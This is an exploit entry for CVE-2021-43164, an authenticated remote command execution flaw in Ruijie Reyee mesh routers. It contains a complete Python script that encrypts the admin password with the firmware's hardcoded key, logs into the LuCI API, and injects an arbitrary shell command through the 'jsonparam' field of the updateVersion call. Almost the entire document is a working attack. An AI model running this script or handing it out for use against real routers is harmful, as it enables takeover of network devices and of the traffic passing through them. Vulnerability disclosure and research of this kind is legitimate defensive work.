# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py ") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)